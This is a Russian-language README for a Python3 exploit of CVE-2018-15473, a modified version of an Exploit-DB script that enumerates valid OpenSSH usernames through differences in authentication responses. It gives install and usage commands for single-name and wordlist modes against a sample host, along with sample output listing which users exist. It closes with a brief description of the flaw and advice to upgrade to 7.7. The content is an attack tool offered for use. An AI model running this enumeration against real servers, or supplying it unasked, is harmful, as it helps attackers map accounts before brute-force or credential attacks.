
Эксплойт на Python для CVE-2018-15473, позволяющий перечисление пользователей OpenSSH через оракул ответа аутентификации, с режимами для одного пользователя и словаря.
SSH-Username-Enumeration-Exploit (OpenSSH 2.3 < 7.7)
Отредактированная версия оригинального эксплойта: https://www.exploit-db.com/exploits/45233
Переведено на Python3
Добавлена опция списка имён пользователей
#Установка зависимостей:
foo@bar:~$ pip3 install -r requirements.txt
#Для одного имени пользователя:
foo@bar:~$ ./Exploit.py 192.168.1.20 -u root
[+] root — существующий пользователь
#Для нескольких имён пользователей:
foo@bar:~$ ./Exploit.py 192.168.1.20 -w username.txt
[+] root — существующий пользователь
[-] mysql — несуществующий пользователь
[-] mike — несуществующий пользователь
[-] foo — несуществующий пользователь
[-] bar — несуществующий пользователь
Существующие пользователи:
root
#Для дополнительных опций:
foo@bar:~$ ./Exploit.py -h
Система по-разному реагирует на успешные и неуспешные попытки аутентификации. Удалённый пользователь может отправлять специально сформированные запросы для определения существующих имён пользователей на целевой системе. Таким образом, удалённый пользователь может определить существующие имена пользователей на целевой системе.
Сервер OpenSSH должен быть обновлён до версии 7.7 или выше.